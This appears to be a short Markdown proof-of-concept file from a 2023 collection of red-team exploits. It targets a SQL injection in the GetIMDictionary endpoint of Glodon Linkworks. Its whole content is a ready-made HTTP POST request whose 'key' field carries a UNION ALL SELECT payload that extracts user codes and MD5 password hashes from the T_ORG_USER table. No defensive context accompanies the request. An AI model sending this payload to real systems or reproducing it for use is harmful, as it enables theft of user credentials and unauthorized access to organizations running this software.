2023Hvv/广联达 Linkworks GetIMDictionarySQL 注入漏洞.md
2023-08-13 14:27:10 +08:00

11 lines
222 B
Markdown

POC:
```
POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --
```